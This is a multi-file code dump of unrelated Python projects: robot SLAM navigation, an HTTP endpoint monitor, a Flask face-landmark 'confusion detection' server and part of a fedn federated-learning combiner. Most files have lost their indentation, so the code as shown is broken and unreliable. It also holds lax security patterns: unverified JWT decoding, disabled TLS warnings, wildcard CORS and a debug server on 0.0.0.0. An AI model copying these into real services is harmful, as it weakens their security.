PATH_ROBOT = "/home/odroid/capdi/robot" # robot SW top path
PATH_MAP = PATH_ROBOT + "/maps" # map directory
PATH_LIB = PATH_ROBOT + "/lib" # libraries
MAP_NAME_NO_SLAM = 'MAP_NO_SLAM.pgm' # map name generated by no_map_slam
MAP_NAME_YES_SLAM = 'MAP_YES_SLAM.pgm' # map name pre-drawn
MAP_NAME_PATH_PLANNING = 'MAP_PATH_PLANNING.png' # map name used by pathplanning algorithm. this one is the only png file
def auto_drive(dest):
print('current position / ', narslam.x, narslam.y)
dest_x = dest[0]#int(input('x>> '))
dest_y = dest[1]#int(input('y>> '))
while math.hypot(dest_x - narslam.x, dest_y - narslam.y) > 50:
print('DISTANCE: ', math.hypot(dest_x - narslam.x, dest_y - narslam.y), '| while entered', )
dx = dest_x - narslam.x
dy = dest_y - narslam.y
if abs(dx) <= 10:
dx = 0
if abs(dy) <= 10:
dy = 0
rad = math.atan2(dx, dy)
deg = math.degrees(rad)
if deg < 0:
deg = 360 + deg
#add 180 and %360 here
#deg = (deg + 180) % 360
deg = (deg+90)%360
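        # note: the +90 degree offset appears to rotate the atan2(dx, dy) bearing into
        # the heading convention used by narslam.theta; this is an observation about
        # the code, not documented behaviour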
print('degree: ', deg, ' | ', narslam.theta, ' | (', narslam.x, ', ', narslam.y, ')')
if abs(deg - narslam.theta) <= 180:
if narslam.theta - 7.5 > deg:
nxt.send(ntdriver.LEFT)
elif narslam.theta + 7.5 < deg:
nxt.send(ntdriver.RIGHT)
else:
nxt.send(ntdriver.FORWARD)
else:
if narslam.theta - 7.5 > deg:
nxt.send(ntdriver.RIGHT)
elif narslam.theta + 7.5 < deg:
nxt.send(ntdriver.LEFT)
else:
nxt.send(ntdriver.FORWARD)
time.sleep(0.2)
nxt.send(ntdriver.STOP)
print('arrived to destination')
print('(', narslam.x, narslam.y, narslam.theta, ')')
def testcode(x, y):
print(narslam.x, narslam.y, narslam.theta)
    print('input destination coordinates in millimeters here')
dest_x_milimeter = x
dest_y_milimeter = y
dest_milimeter = (dest_x_milimeter, dest_y_milimeter)
start_milimeter = (narslam.x, narslam.y)
navi = pathengine.navigation(PATH_MAP + '/' + MAP_NAME_PATH_PLANNING)
navi.search(start_milimeter, dest_milimeter)
navi.extract_rally()
print(navi.path_rally)
for point in navi.path_rally:
auto_drive(point)
print('drive done')
#time.sleep(0.5)
print('arrived on final destination')
def handler(signum, frame):
nxt.send('0')
narslam.flag = 1
t_slam.join()
print('ctrl+Z handling called')
sys.exit(0)
if __name__ == "__main__":
signal.signal(signal.SIGTSTP, handler)
print ('firmware started')
narslam = rpslam.narlam()
#TODO: do yes map slam
t_slam = threading.Thread(target=narslam.slam_yes_map, args=(PATH_MAP, MAP_NAME_YES_SLAM))
t_slam.start()
print('SLAM activated')
nxt = ntdriver.lego_nxt()
nxt.connect()
nxt.send('s40')
print('nxt connected')
while(1):
#if not narslam.viz.display(narslam.x/1000, narslam.y/1000, narslam.theta, narslam.mapbytes):
# exit(0)
cmd = input("please give me order\n(\"goto\": run testcode | 0,1,2,3,4: move)\n>> ")
if cmd == 'goto':
            x = int(input('x>> '))
            y = int(input('y>> '))
testcode(x, y)
print('testcode done')
elif cmd == 'run':
while True:
testcode(1800, 2200)
testcode(2300, 1800)
testcode(900, 900)
testcode(1400, 1400)
testcode(900, 1400)
elif cmd == 'exit':
print('exit')
nxt.send('0')
narslam.flag = 1
t_slam.join()
sys.exit(0)
else:
nxt.send(cmd)
print('(', narslam.x, '|', narslam.y, '| Angle: ', narslam.theta, ')')
|
IntervalRunner.py
|
import threading
import time
class IntervalRunner:
def __init__(self, action, interval):
self.interval = interval
self.action = action
self.stop_event = threading.Event()
thread = threading.Thread(target=self._set_interval)
thread.start()
def _set_interval(self):
next_time = time.time() + self.interval
while not self.stop_event.wait(next_time - time.time()):
next_time += self.interval
self.action()
def cancel(self):
self.stop_event.set()
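# A minimal usage sketch (the callback and 5-second period are only examples):
#
#   runner = IntervalRunner(lambda: print("tick"), interval=5)
#   ...                      # action fires every 5 seconds without drifting
#   runner.cancel()          # stops the background loop at the next wake-up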
|
__init__.py
|
""" HEM - HTTP(s) Endpoint Monitor """
from multiprocessing import Pool
from datetime import timedelta
import abc
import logging
import os
import requests
import click
import yaml
import six
import time
import pike.discovery
from pike.manager import PikeManager
import pkg_resources
import threading
import jwt
__version__ = pkg_resources.get_distribution("hemApp").version
class HemStore:
def __init__(self):
self.data = {}
def set(self, key, value):
self.data[key] = value
def get(self, key):
return self.data.get(key, None)
logging.captureWarnings(True)
logger = logging.getLogger(__name__)
def load_config(path = 'hem.yaml'):
"""
Load configuration
"""
path_list = [path, '/etc/hem.yaml']
env_path = os.getenv('HEM_CONFIG', None)
if env_path:
path_list.insert(0, env_path)
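    # resulting precedence: $HEM_CONFIG (if set), then the path argument
    # (default ./hem.yaml), then /etc/hem.yaml; the first existing file wins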
for path in path_list:
if os.path.exists(path):
with open(path, 'rt') as config_file:
return yaml.safe_load(config_file.read())
click.echo("No config found in "+', '.join(path_list))
exit(2)
@six.add_metaclass(abc.ABCMeta)
class Metrics(object):
"""Base class for storing of metrics data
"""
@abc.abstractmethod
def __init__(self):
""" Abstract init method """
@abc.abstractmethod
def stage(self, data):
"""Gather the data for storing
:param data: object containing data points
:returns: True or False
"""
@abc.abstractmethod
def store(self):
""" Saves current buffer """
class Check(object):
""" A check and it's testing """
url = ""
method = "get"
name = ""
headers = {"User-Agent": "Hem {}"+__version__}
expected = None
in_body = None
timeout = 10
metrics = None
storage = None
auth = {}
token = None
certificate = None
def __init__(self, name, test, metrics=None, storage=None):
#path, secure=False, verify=True, metrics=None):
self.logger = logging.getLogger(__name__)
self.name = name
self.verify = test.get('verify', True)
if test.get('secure', False):
self.url = "https://{}" + test.get('path', '')
else:
self.url = "http://{}" + test.get('path', '')
self.method = test.get('method', "get")
if 'timeout' in test:
self.timeout = test['timeout']
if 'expected' in test:
self.expected = test['expected']
if 'in_body' in test:
self.in_body = test['in_body']
if 'certificate' in test:
self.logger.info("Setting certificate to %s", test['certificate'])
self.certificate = test['certificate']
        if 'headers' in test:
            # copy the class-level default so per-check headers do not leak between instances
            self.headers = dict(self.headers)
            for header in test['headers']:
                self.headers[header] = test['headers'][header]
if 'auth' in test:
self.auth = test['auth']
self.metrics = metrics
self.storage = storage
def get_jwt(self, auth={}):
j = requests.post(
auth['url'],
data=auth.get('body', None),
headers=auth.get('headers', None)
)
self.logger.debug(j.status_code)
self.logger.debug(j.text)
token = j.json().get(auth['field'], None)
self.storage.set(auth.get('key', 'jwt'), token)
self.logger.debug("storing token: {}".format(token))
def is_jwt_valid(self, auth={}):
token = self.storage.get(auth.get('key', 'jwt'))
if token is None:
self.logger.debug("No token - therefore not valid")
return False
else:
decoded = jwt.decode(token, verify=False)
if time.time() < decoded['exp']:
self.logger.debug("token still valid")
return True
else:
self.logger.debug("token has expired")
return False
def test(self, param, results):
"""
Core test routine: run the check against a single parameter (host) and
append a (status, elapsed_time) tuple to the shared results list.
"""
elapsed_time = timedelta(seconds=0)
if self.auth.get('type', None) == "jwt":
self.logger.info("Using JWT, checking token")
# If we're using JWT, then we need a token
if self.is_jwt_valid(self.auth) == False:
self.logger.info("JWT: token invalid")
# If there is no token or it's expired, then get one
self.get_jwt(self.auth)
self.headers = {"Authorization":"Bearer {}".format(self.storage.get(self.auth.get('key', 'jwt')))}
self.logger.info(self.headers)
try:
size = 0
http_call=getattr(requests,self.method)
start = time.time()
result = http_call(
self.url.format(param if type(param) == str else param["host"]),
headers=self.headers,
timeout=self.timeout,
verify=self.verify,
cert=self.certificate,
allow_redirects=False
)
self.logger.debug("Response text: %s", result.text)
elapsed_time = result.elapsed
result.raise_for_status()
size = len(result.text)
status = result.status_code
except requests.exceptions.HTTPError as he:
self.logger.debug(he)
self.report_failure(param, result.text)
elapsed_time = result.elapsed
status = result.status_code
except requests.exceptions.SSLError as ssl_error:
self.logger.debug(ssl_error)
self.report_failure(param, ssl_error.strerror)
status = 526
except requests.exceptions.ConnectTimeout as timeout:
self.logger.debug(timeout)
self.report_failure(param, timeout.strerror)
status = 522
elapsed_time = timedelta(seconds=self.timeout)
except requests.exceptions.ReadTimeout as timeout:
self.logger.debug(timeout)
self.report_failure(param, timeout.strerror)
status = 522
elapsed_time = timedelta(seconds=self.timeout)
except requests.exceptions.ConnectionError as connection:
self.logger.debug(connection)
self.report_failure(param, connection.strerror)
status = 444
roundtrip_time = time.time() - start
success = 0
self.logger.debug(self)
if self.expected:
self.logger.debug("Testing status of {} against {}".format(status, self.expected))
if status == self.expected:
success = 1
elif status == requests.codes.ok:
success = 1
if success == 1 and self.in_body:
self.logger.debug("Entering if in body")
self.logger.debug("Testing body for {} in {}".format(self.in_body, result.text))
if self.in_body in result.text:
success = 1
else:
success = 0
status = 600
if self.metrics:
metric_name = param if type(param) == str else param["metric"]
self.metrics.stage(
"{}.{}.result".format(self.name, metric_name.replace('.', '_')),
status
)
self.metrics.stage(
"{}.{}.success.count".format(self.name, metric_name.replace('.', '_')),
success
)
self.metrics.stage(
"{}.{}.failure.count".format(self.name, metric_name.replace('.', '_')),
0 if success == 1 else 1
)
self.metrics.stage(
"{}.{}.time".format(self.name, metric_name.replace('.', '_')),
elapsed_time.total_seconds()
)
self.metrics.stage(
"{}.{}.roundtrip".format(self.name, metric_name.replace('.', '_')),
roundtrip_time
)
self.metrics.stage(
"{}.{}.size".format(self.name, metric_name.replace('.', '_')),
size
)
results.append((status, elapsed_time))
def test_list(self, param_list):
""" Run test over a list of parameters """
results = []
threads = []
# Start a thread for each parameter
for param in param_list:
if param and '{' in param:
param = param.format(**os.environ)
if param != None:
t = threading.Thread(target=self.test, args=(param, results))
threads.append(t)
t.start()
for i in range(len(threads)):
threads[i].join()
self.logger.debug(results)
return results
def report_failure(self, param, message):
""" Display errors """
try:
click.echo(click.style("{} Failed with {}".format(param, message.split('\n')[0]),fg='red'))
except AttributeError:
click.echo(message)
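# Usage sketch (an illustration that assumes network access to a reachable host,
# not part of the original module). A Check is built from a name plus the
# per-test dict handled in __init__, then run over a host list; each entry in
# the returned list is a (status, elapsed_time) tuple.
#
# check = Check("homepage", {"path": "/", "secure": True, "expected": 200})
# print(check.test_list(["example.com"]))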
def discover_hosts(src, metrics=None):
discovery_type = src['type']
try:
host_list = list()
with PikeManager(['.', 'drivers']):
discovery = pike.discovery.py.get_module_by_name('hemApp.drivers.discovery_' + discovery_type)
if None != metrics:
src['metrics'] = metrics
try:
host_list = discovery.hosts(**src)
except Exception as e:
logger.error("{} discovery of failed with exception".format(discovery_type))
logger.exception(e)
host_list = []
return host_list
except ImportError as e:
logger.exception(e)
click.echo("Discovery method {} not found".format(discovery_type))
return []
def initialise_metrics(metricConfig):
with PikeManager(['.', 'drivers']):
metrics_driver = pike.discovery.py.get_module_by_name(
'hemApp.drivers.metrics_' + metricConfig.get('type','console')
)
return metrics_driver.instance(metricConfig)
def run_tests(config, metrics=None, storage=None):
# Disable InsecureRequestWarning; when these warnings occur they are expected
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
start = time.time()
logger.info("Started tests at {}".format(start))
if 'discovery' in config:
DEFAULT_DISCOVERY = config['discovery']
else:
DEFAULT_DISCOVERY = {}
store = {}
for test_name in config['tests']:
test = config['tests'][test_name]
# Host list can be an array in the config or discovery
if 'hosts' in test:
hosts = test['hosts']
elif 'discovery' in test:
# Local discovery section inherits the defaults, with local keys overriding them
discovery = DEFAULT_DISCOVERY.copy()
discovery.update(test['discovery']) # Python 3.5 move to context = {**defaults, **user}
hosts = discover_hosts(discovery, metrics)
else:
hosts = []
logger.info("Testing {0} across {1} hosts".format(test_name, len(hosts)))
logger.debug(test)
CHECK = Check(
test_name,
test,
metrics,
storage
)
# test.get('secure',False),
# test.get('verify',True),
start_test = time.time()
results = CHECK.test_list(hosts)
logger.debug(results)
elapsed_test = time.time() - start_test
metrics.stage('hem.elapsed.{}'.format(test_name), elapsed_test)
end = time.time()
metrics.stage('hem.elapsed.loop', end - start)
metrics.store()
return (end - start)
def run_tests_threaded(config, metrics=None, storage=None):
# NOTE: currently identical to run_tests(); kept as a separate entry point.
# Disable InsecureRequestWarning; when these warnings occur they are expected
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
start = time.time()
logger.info("Started tests at {}".format(start))
if 'discovery' in config:
DEFAULT_DISCOVERY = config['discovery']
else:
DEFAULT_DISCOVERY = {}
store = {}
for test_name in config['tests']:
test = config['tests'][test_name]
# Host list can be an array in the config or discovery
if 'hosts' in test:
hosts = test['hosts']
elif 'discovery' in test:
# Local discovery section inherits the defaults, with local keys overriding them
discovery = DEFAULT_DISCOVERY.copy()
discovery.update(test['discovery']) # Python 3.5 move to context = {**defaults, **user}
hosts = discover_hosts(discovery, metrics)
else:
hosts = []
logger.info("Testing {0} across {1} hosts".format(test_name, len(hosts)))
logger.debug(test)
CHECK = Check(
test_name,
test,
metrics,
storage
)
# test.get('secure',False),
# test.get('verify',True),
start_test = time.time()
results = CHECK.test_list(hosts)
logger.debug(results)
elapsed_test = time.time() - start_test
metrics.stage('hem.elapsed.{}'.format(test_name), elapsed_test)
end = time.time()
metrics.stage('hem.elapsed.loop', end - start)
metrics.store()
return (end - start)
|
main.py
|
import json
import base64
import numpy as np
import cv2
import os
import mediapipe as mp
import math
from sklearn.svm import OneClassSVM
from sklearn import svm
from joblib import dump, load
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC
from sklearn.linear_model import SGDClassifier
import time
import argparse
import flask
from flask import Flask, redirect, render_template, request
from threading import Thread
import logging
from datetime import date
import re
import shutil
CNTR = 0
TOTAL = 400
# deployed = False
FILEPATH = '/mnt/fileserver'
# FILEPATH = '/mnt/d/mnt/fileserver' # Test using wsl
# FILEPATH = 'fileserver'
POI4AOI = [33, 7, 163, 144, 145, 153, 154, 155, 133, 246, 161, 160, 159,
158, 157, 173, 263, 249, 390, 373, 374, 380, 381, 382, 362,
466, 388, 387, 386, 385, 384, 398, 46, 53, 52, 65, 55, 70, 63, 105,
66, 107, 276, 283, 282, 295, 285, 300, 293, 334, 296, 336]
if not os.path.exists(FILEPATH):
# os.rmdir(FILEPATH)
os.makedirs(FILEPATH)
print('folder {} not found, created one.'.format(FILEPATH))
modelPool = {}
metricPool = {}
def _normalized_to_pixel_coordinates(normalized_x, normalized_y, image_width, image_height):
"""Converts normalized value pair to pixel coordinates."""
# Checks if the float value is between 0 and 1.
def is_valid_normalized_value(value: float) -> bool:
return (value > 0 or math.isclose(0, value)) and (value < 1 or
math.isclose(1, value))
if not (is_valid_normalized_value(normalized_x) and
is_valid_normalized_value(normalized_y)):
# TODO: Draw coordinates even if it's outside of the image bounds.
return None
x_px = min(math.floor(normalized_x * image_width), image_width - 1)
y_px = min(math.floor(normalized_y * image_height), image_height - 1)
return x_px, y_px
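# Worked example: on a 640x480 image the normalized point (0.5, 0.25) maps to
# pixel coordinates (320, 120); values outside [0, 1] make the function return None.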
def getCrop(img, landmarks):
h, w, _ = img.shape
pt1, pt2, pt3 = landmarks.landmark[133], landmarks.landmark[362], landmarks.landmark[2]
matrix = warpFrom(
_normalized_to_pixel_coordinates(pt1.x, pt1.y, w, h),
_normalized_to_pixel_coordinates(pt2.x, pt2.y, w, h),
_normalized_to_pixel_coordinates(pt3.x, pt3.y, w, h),
)
dstImg = cv2.warpAffine(img, matrix, (img.shape[1], img.shape[0]))
left, top, bottom, right = -1, -1, -1, -1
init = False
for idx in POI4AOI:
px = landmarks.landmark[idx]
try:
px = _normalized_to_pixel_coordinates(px.x, px.y, w, h)
px = (matrix @ np.array([px[0], px[1], 1])).astype(int)  # np.int was removed in NumPy 1.24+
if not init:
left, right = px[0], px[0]
top, bottom = px[1], px[1]
init = True
continue
if left > px[0]:
left = px[0]
if right < px[0]:
right = px[0]
if top > px[1]:
top = px[1]
if bottom < px[1]:
bottom = px[1]
except Exception as e:
print('ERROR:{}'.format(e))
# return cv2.rectangle(dstImg, (left, top), (right, bottom), (255, 0, 0), 2)
return dstImg[top:bottom+1, left:right+1]
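# Added description (not from the original source): getCrop() warps the frame so
# that three reference landmarks (133, 362 and 2) land on fixed pixel positions
# via warpFrom() below, then crops the bounding box of the eye/eyebrow landmarks
# listed in POI4AOI from the aligned image.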
def warpFrom(pt1, pt2, pt3):
srcTri = np.array([[pt1[0], pt1[1]],
[pt2[0], pt2[1]],
[pt3[0], pt3[1]]]).astype(np.float32)
dstTri = np.array([[300, 180],
[340, 180],
[320, 240]]).astype(np.float32)
matrix = cv2.getAffineTransform(srcTri, dstTri)
return matrix
class Metric:
def __init__(self):
self.req_count = 0
self.file_count = 0
self.nc_req_first = 0
self.nc_req_last = 0
self.nc_file_first = 0
self.nc_file_last = 0
self.c_req_first = 0
self.c_req_last = 0
self.c_file_first = 0
self.c_file_last = 0
def inc_req(self):
self.req_count += 1
def inc_file(self):
self.file_count += 1
def output(self):
text = 'REQ COUNT : {}, FILE COUNT : {}\n'.format(
self.req_count, self.file_count)
text = text + 'NC PHASE: Req last {}, first {}, diff {}, File last {}, first {}, diff {}\n'.format(
self.nc_req_last, self.nc_req_first, self.nc_req_last - self.nc_req_first,
self.nc_file_last, self.nc_file_first, self.nc_file_last - self.nc_file_first
)
text = text + 'C PHASE: Req last {}, first {}, diff {}, File last {}, first {}, diff {}\n'.format(
self.c_req_last, self.c_req_first, self.c_req_last - self.c_req_first,
self.c_file_last, self.c_file_first, self.c_file_last - self.c_file_first
)
return text
class StatePredictor:
def __init__(self, usrname, logger):
global FILEPATH
self.facemesh = mp.solutions.face_mesh.FaceMesh(
max_num_faces=1,
min_detection_confidence=0.5)
self.inputs = []
self.labels = []
self.clf = None
self.pca = None
self.username = usrname
self.retrain_interval = 200 # TODO: incremental training!
self.dir = os.path.join(FILEPATH, str(self.username), 'face')
self.trained = False
self.model_ver = 0
# Same logger as gunicorn
self.logger = logger
# currently we make sure old images and models are removed before each lecture
if not os.path.exists(self.dir):
os.makedirs(self.dir)
else:
modelfiles = [f for f in os.listdir(self.dir) if '.joblib' in f]
# find pca:
pca_suspects = [f for f in modelfiles if re.search(
r"^pca\.\d+\.joblib", f) is not None]
# find model_pca:
model_suspects = [f for f in modelfiles if re.search(
r"^model_pca\.\d+\.joblib", f) is not None]
if len(pca_suspects) == 1 and len(model_suspects) == 1:
pca_path = pca_suspects[0]
model_path = model_suspects[0]
self.clf = load(os.path.join(self.dir, model_path))
self.pca = load(os.path.join(self.dir, pca_path))
self.model_ver = int(pca_path.split('.')[1])
self.trained = True
def model_reset(self):
shutil.rmtree(self.dir)
os.makedirs(self.dir)
self.trained = False
self.model_ver = 0
self.pca = None
self.clf = None
def incre_train(self, img, label, ver):
old_model_path = 'model_pca.{}.joblib'.format(ver - 1)
old_pca_path = 'pca.{}.joblib'.format(ver - 1)
if not self.trained:
# load latest model
# if the model is up-to-date, ver should be exactly model_ver + 1,
# otherwise, we should load latest model (ver - 1) before incremental training.
# Also remove old models before updating to new ones.
if not os.path.exists(os.path.join(self.dir, old_model_path)) or \
not os.path.exists(os.path.join(self.dir, old_pca_path)):
return
self.trained = True
if ver > self.model_ver + 1 or self.clf is None:
self.clf = load(os.path.join(self.dir, old_model_path))
self.pca = load(os.path.join(self.dir, old_pca_path))
os.remove(os.path.join(self.dir, old_model_path))
os.remove(os.path.join(self.dir, old_pca_path))
# train one step
gt_input = np.reshape(img, (1,-1))
gt_input = self.pca.transform(gt_input)
gt_label = np.array([str(label)])
self.clf = self.clf.partial_fit(gt_input, gt_label)
self.logger.info('model updated: {} -> {}'.format(self.model_ver, ver))
self.model_ver = ver
dump(self.clf, os.path.join(
self.dir, 'model_pca.{}.joblib'.format(self.model_ver)))
dump(self.pca, os.path.join(self.dir, 'pca.{}.joblib'.format(self.model_ver)))
def addData(self, img, label, frameId, incre=False, ver=0):
global TOTAL, metricPool
# if self.trained and not incre:
# self.logger.info('Ignore...')
# Save collected image.
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img.flags.writeable = False
results = self.facemesh.process(img)
img.flags.writeable = True
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
if results.multi_face_landmarks:
face_landmarks = results.multi_face_landmarks[0]
# self.logger.debug(matrix)
cropped = getCrop(img, face_landmarks)
img = cv2.cvtColor(cv2.resize(
cropped, (100, 50)), cv2.COLOR_BGR2GRAY)
if not incre:
cv2.imwrite(os.path.join(
self.dir, '{}_{}.jpg'.format(label, frameId)
), img)
else:
self.incre_train(img, label, ver)
metricPool[self.username].inc_file()
if frameId == TOTAL:
# Receive first frame
if label == 0:
metricPool[self.username].nc_file_first = time.time()
else:
metricPool[self.username].c_file_first = time.time()
if frameId == 1:
# Receive last frame
if label == 0:
metricPool[self.username].nc_file_last = time.time()
else:
metricPool[self.username].c_file_last = time.time()
def train(self):
inputs = []
labels = []
img_list = [f for f in os.listdir(self.dir) if '.jpg' in f]
for f in img_list:
label, _ = f.split('_')
img = cv2.imread(os.path.join(self.dir, f), cv2.IMREAD_GRAYSCALE)
inputs.append(np.reshape(img, (-1)))
labels.append(label)
inputs = np.array(inputs)
labels = np.array(labels)
t0 = time.time()
n_component = 150
self.pca = PCA(n_component, svd_solver='auto',
whiten=True).fit(inputs)
self.logger.info('PCA fit done in {}s'.format(time.time() - t0))
t0 = time.time()
X_train_pca = self.pca.transform(inputs)
self.logger.info('PCA transform done in {}s'.format(
time.time() - t0))
t0 = time.time()
# self.clf = SVC()
self.clf = SGDClassifier()
self.logger.debug(X_train_pca.shape)
self.clf = self.clf.fit(X_train_pca, labels)
self.logger.info('SGDClassifier train done in {}s'.format(time.time() - t0))
dump(self.clf, os.path.join(self.dir, 'model_pca.0.joblib'))
dump(self.pca, os.path.join(self.dir, 'pca.0.joblib'))
self.trained = True
def threaded_train(self):
Thread(target=self.train).start()  # pass the bound method itself; calling it here would train synchronously
self.logger.info('Threaded Training Started!!!')
return
def confusionDetection(self, img, ver):
model_path = 'model_pca.{}.joblib'.format(ver)
pca_path = 'pca.{}.joblib'.format(ver)
if not self.trained:
# return 'training'
if not os.path.exists(os.path.join(self.dir, model_path)) or not \
os.path.exists(os.path.join(self.dir, pca_path)):
return 'training'
self.trained = True
if self.clf is None or self.model_ver != ver:
self.clf = load(os.path.join(self.dir, model_path))
self.pca = load(os.path.join(self.dir, pca_path))
self.model_ver = ver
tag = ['Neutral', 'Confused']
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img.flags.writeable = False
results = self.facemesh.process(img)
img.flags.writeable = True
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
if results.multi_face_landmarks:
face_landmarks = results.multi_face_landmarks[0]
# self.logger.debug(matrix)
cropped = getCrop(img, face_landmarks)
img = cv2.cvtColor(cv2.resize(
cropped, (100, 50)), cv2.COLOR_BGR2GRAY)
feature = np.reshape(img, (1, -1))
reduced_feature = self.pca.transform(feature)
pred = self.clf.predict(reduced_feature)
self.logger.debug(pred)
res = tag[int(pred[0])]
return res
return 'N/A'
app = Flask(__name__)
@app.route('/', methods=['GET'])
def index():
"""
The home page has a list of prior translations and a form to
ask for a new translation.
"""
return "<h1>GazeLearning Server: There's nothing you can find here!</h1>"
@app.route('/detection', methods=['POST'])
def confusion_detection():
global CNTR, TOTAL, FILEPATH
data = request.data #.decode('utf-8')
data = json.loads(data)
# app.logger.debug(data)
img_bytes = base64.b64decode(data['img'].split(',')[1])
im_arr = np.frombuffer(img_bytes, dtype=np.uint8)
img = cv2.imdecode(im_arr, flags=cv2.IMREAD_COLOR)
stage = data['stage']
username = data['username']
ver = data['ver']
if username not in modelPool:
metricPool[username] = Metric()
modelPool[username] = StatePredictor(username, app.logger)
result = 'success'
try:
if stage == 0:
app.logger.info('%s stage %s %s:No.%s %s',
username, stage,
'Confusion' if data['label'] else 'Neutral',
TOTAL + 1 - data['frameId'], time.time())
metricPool[username].inc_req()
modelPool[username].addData(img, data['label'], data['frameId'])
app.logger.info('after add data')
if data['frameId'] == TOTAL:
# Receive first frame
if data['label'] == 0:
metricPool[username].nc_req_first = time.time()
else:
modelPool[username].model_reset()
metricPool[username].c_req_first = time.time()
elif data['frameId'] == 1:
# Receive last frame
if data['label'] == 0:
metricPool[username].nc_req_last = time.time()
# here train the classifier at the last frame of NC collecting stage
modelPool[username].threaded_train()
else:
metricPool[username].c_req_last = time.time()
elif stage == 1:
result = modelPool[username].confusionDetection(img, ver)
else:
modelPool[username].addData(
img, data['label'], data['frameId'], incre=True, ver=ver)
except Exception as e:
result = 'ERROR'
app.logger.error(e)
resp = flask.Response()
resp.set_data(json.dumps({'body': {'result': result}}))
resp.headers['Access-Control-Allow-Origin'] = '*'
resp.headers["Access-Control-Allow-Methods"] = "GET,POST,OPTIONS"
resp.headers["Access-Control-Allow-Headers"] = "x-api-key,Content-Type"
resp.headers['Content-Type'] = 'application/json'
return resp
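# Hypothetical client-side sketch of the JSON body /detection expects; the field
# names come from the handler above, while the URL, filename and values are
# placeholders:
#
# import base64, json, requests
# with open("frame.jpg", "rb") as f:
#     img_b64 = base64.b64encode(f.read()).decode()
# payload = {
#     "img": "data:image/jpeg;base64," + img_b64,  # handler splits on ',' and decodes
#     "stage": 0,       # 0: collect training frames, 1: detect, otherwise incremental update
#     "username": "alice",
#     "ver": 0,
#     "label": 0,       # 0: neutral, 1: confused
#     "frameId": 400,   # counts down from TOTAL (400) to 1
# }
# requests.post("http://localhost:8000/detection", data=json.dumps(payload))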
if __name__ == '__main__':
# This part of code will NOT be executed since we are using gunicorn.
# parser = argparse.ArgumentParser()
# parser.add_argument("-p", "--portid", type=int, default=0,
# help="port id")
# args = parser.parse_args()
# PORT = 8000 + args.portid
PORT = 8000
# This is used when running locally only. When deploying to Google App
# Engine, a webserver process such as Gunicorn will serve the app. This
# can be configured by adding an `entrypoint` to app.yaml.
# Flask's development server will automatically serve static files in
# the "static" directory. See:
# http://flask.pocoo.org/docs/1.0/quickstart/#static-files. Once deployed,
# App Engine itself will serve those files as configured in app.yaml.
app.run(host='0.0.0.0', port=PORT, debug=True, threaded=True)
else:
# use same log handlers as in gunicorn logger
gunicorn_logger = logging.getLogger('gunicorn.error')
app.logger.handlers = gunicorn_logger.handlers
app.logger.setLevel(gunicorn_logger.level)
|
combiner.py
|
import os
import queue
import sys
import threading
import uuid
from datetime import datetime, timedelta
from fedn.common.net.connect import ConnectorCombiner, Status
from fedn.common.net.grpc.server import Server
import fedn.common.net.grpc.fedn_pb2 as fedn
import fedn.common.net.grpc.fedn_pb2_grpc as rpc
from fedn.clients.combiner.modelservice import ModelService
from fedn.common.storage.s3.s3repo import S3ModelRepository
import requests
import json
import io
import time
import base64
from collections import defaultdict
from enum import Enum
class Role(Enum):
WORKER = 1
COMBINER = 2
REDUCER = 3
OTHER = 4
def role_to_proto_role(role):
"""
:param role:
:return:
"""
if role == Role.COMBINER:
return fedn.COMBINER
if role == Role.WORKER:
return fedn.WORKER
if role == Role.REDUCER:
return fedn.REDUCER
if role == Role.OTHER:
return fedn.OTHER
####################################################################################################################
####################################################################################################################
class Combiner(rpc.CombinerServicer, rpc.ReducerServicer, rpc.ConnectorServicer, rpc.ControlServicer):
""" Communication relayer. """
def __init__(self, connect_config):
# Holds client queues
self.clients = {}
self.modelservice = ModelService()
self.id = connect_config['myname']
self.role = Role.COMBINER
self.max_clients = connect_config['max_clients']
self.model_id = None
announce_client = ConnectorCombiner(host=connect_config['discover_host'],
port=connect_config['discover_port'],
myhost=connect_config['myhost'],
myport=connect_config['myport'],
token=connect_config['token'],
name=connect_config['myname'])
response = None
while True:
status, response = announce_client.announce()
if status == Status.TryAgain:
print(response, flush=True)
time.sleep(5)
continue
if status == Status.Assigned:
config = response
print("COMBINER: was announced successfully. Waiting for clients and commands!", flush=True)
break
if status == Status.UnAuthorized:
print(response, flush=True)
sys.exit("Exiting: Unauthorized")
cert = base64.b64decode(config['certificate']) # .decode('utf-8')
key = base64.b64decode(config['key']) # .decode('utf-8')
grpc_config = {'port': connect_config['myport'],
'secure': connect_config['secure'],
'certificate': cert,
'key': key}
self.repository = S3ModelRepository(config['storage']['storage_config'])
self.server = Server(self, self.modelservice, grpc_config)
from fedn.common.tracer.mongotracer import MongoTracer
self.tracer = MongoTracer(config['statestore']['mongo_config'], config['statestore']['network_id'])
from fedn.clients.combiner.roundcontrol import RoundControl
self.control = RoundControl(self.id, self.repository, self, self.modelservice)
threading.Thread(target=self.control.run, daemon=True).start()
self.server.start()
def __whoami(self, client, instance):
def role_to_proto_role(role):
"""
:param role:
:return:
"""
if role == Role.COMBINER:
return fedn.COMBINER
if role == Role.WORKER:
return fedn.WORKER
if role == Role.REDUCER:
return fedn.REDUCER
if role == Role.OTHER:
return fedn.OTHER
client.name = instance.id
client.role = role_to_proto_role(instance.role)
return client
def get_active_model(self):
"""
:return:
"""
return self.model_id
def set_active_model(self, model_id):
"""
:param model_id:
"""
self.model_id = model_id
def report_status(self, msg, log_level=fedn.Status.INFO, type=None, request=None, flush=True):
print("{}:COMBINER({}):{} {}".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), self.id, log_level, msg), flush=flush)
def request_model_update(self, model_id, clients=[]):
""" Ask clients to update the current global model.
Parameters
----------
model_id : str
The id of the model to be updated.
clients : list
List of clients to submit a model update request to.
An empty list (default) results in a broadcast to
all connected training clients.
"""
request = fedn.ModelUpdateRequest()
self.__whoami(request.sender, self)
request.model_id = model_id
request.correlation_id = str(uuid.uuid4())
request.timestamp = str(datetime.now())
if len(clients) == 0:
clients = self.get_active_trainers()
for client in clients:
request.receiver.name = client.name
